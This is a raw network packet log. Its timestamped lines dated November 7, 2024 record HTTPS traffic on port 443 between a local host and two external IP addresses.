Nov 7, 2024 07:33:11.082434893 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082483053 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.082597971 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082638979 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.082839012 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082878113 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.083197117 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.083528996 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.083590031 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.083595991 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.083630085 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083663940 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.083687067 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.083740950 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083801031 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083842039 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.083858013 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083873034 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.083939075 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083965063 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.083969116 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.084543943 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.084604979 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.085000038 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.085053921 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.085057974 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.085107088 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.094527006 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.094566107 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.094652891 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.094743967 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.094743967 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.094753027 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.094759941 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.096342087 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.096357107 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.096431971 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.096528053 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.096540928 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.123811960 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.123871088 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.124245882 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.124296904 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.124852896 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.124901056 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.125602007 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.125653982 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.125880957 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.125935078 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.197098970 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.197169065 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.197318077 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.197371960 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.198133945 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.198185921 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.198590040 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.198646069 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.198867083 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.198918104 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.199301004 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.199354887 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.238445044 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.238497019 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.239068031 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.239120960 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.239671946 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.239727020 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.240044117 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.240089893 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.240623951 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.240669012 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.241482019 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.241547108 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.312366009 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.312429905 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.312649965 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.312701941 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.313007116 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.313057899 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.313879013 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.313920975 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.313936949 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.313941956 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.313957930 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.313976049 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.314870119 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.314925909 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.353787899 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.353840113 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.354190111 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.354248047 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.354849100 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.354902983 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.355281115 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.355339050 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.355731964 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.355782986 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.356475115 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.356522083 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.356820107 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.356859922 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.364382029 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.364816904 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.364842892 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.365287066 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.365293026 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.427453041 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.427618980 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.427882910 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.427942038 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.428534031 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.428589106 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.429007053 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.429058075 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.429645061 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.429697990 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.430356979 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.430402040 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.469257116 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.469324112 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.470957994 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.470964909 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.470989943 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.471015930 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.471024990 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.471035957 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.471060991 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.496201038 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.496248960 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.496423006 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.496465921 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.496479988 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.496489048 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.496495962 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.499110937 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.499136925 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.499209881 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.499403954 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.499417067 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.536819935 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.537205935 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.537229061 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.537579060 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.537585020 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.542701006 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.542720079 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.542762995 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.542768955 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.542937994 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.544349909 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.544364929 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.544414997 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.544420958 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.544569016 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.585267067 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.585282087 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.585356951 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.585362911 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.585612059 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.587230921 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.587244987 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.587291956 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.587296963 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.587376118 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.658896923 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.658911943 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.658967972 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.658973932 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.659208059 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.667140007 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.667182922 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.667315006 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.667334080 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.667341948 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.667351961 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.667356968 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.669179916 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.669205904 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.669269085 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.669379950 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.669392109 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.699881077 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.699894905 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.699966908 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.699974060 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.701956034 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.701976061 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.702013969 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.702018976 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.702038050 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.702063084 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.704170942 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.704184055 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.704237938 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.704242945 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.706940889 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.774987936 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.775007963 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.775161982 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.775168896 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.775203943 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.810688972 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.811047077 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.811065912 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.811445951 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.811450958 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.815443039 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.815829992 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.815854073 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.815923929 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.815937996 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.815996885 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.816001892 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.816036940 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.816309929 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.816315889 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.817158937 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.817172050 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.817231894 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.817236900 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.817272902 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.836656094 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.836936951 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.836946964 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.837467909 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.837472916 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.860399008 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.860414028 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.860466003 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.860471010 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.860507965 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.890228033 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.890243053 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.890316010 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.890321970 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.890357971 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.931209087 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.931222916 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.931278944 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.931284904 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.931332111 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.932763100 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.932776928 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.932936907 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.932941914 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.932977915 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.940440893 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.940603971 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.940654039 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.940679073 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.940692902 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.940701008 CET	49807	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.940706968 CET	443	49807	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.942915916 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.942934036 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.942998886 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.943129063 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.943146944 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.946171999 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.946233034 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.946275949 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.946340084 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.946352005 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.946360111 CET	49808	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.946363926 CET	443	49808	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.948080063 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.948096037 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.948163986 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.948287010 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.948297024 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.967466116 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.967884064 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.967931986 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.967957020 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.967967987 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.967979908 CET	49809	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.967987061 CET	443	49809	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.969796896 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.969810009 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.969876051 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.969980955 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.969994068 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.004375935 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.004390001 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.004460096 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.004466057 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.004507065 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.005425930 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.005439043 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.005491972 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.005496979 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.005522013 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.005538940 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.046442986 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.046464920 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.046561003 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.046569109 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.046610117 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.048012972 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.048028946 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.048083067 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.048086882 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.048126936 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.091512918 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.091530085 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.091604948 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.091612101 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.091650963 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.120760918 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.120779037 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.120840073 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.120846987 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.120873928 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.120889902 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.168273926 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.168296099 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.168359995 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.168365955 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.168405056 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.169815063 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.169832945 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.169886112 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.169891119 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.169933081 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.171399117 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.171412945 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.171466112 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.171472073 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.171506882 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.226973057 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.227397919 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.227410078 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.227853060 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.227858067 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.235414028 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.235433102 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.235512972 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.235518932 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.235557079 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.236809969 CET	443	49799	172.67.195.247	192.168.2.4
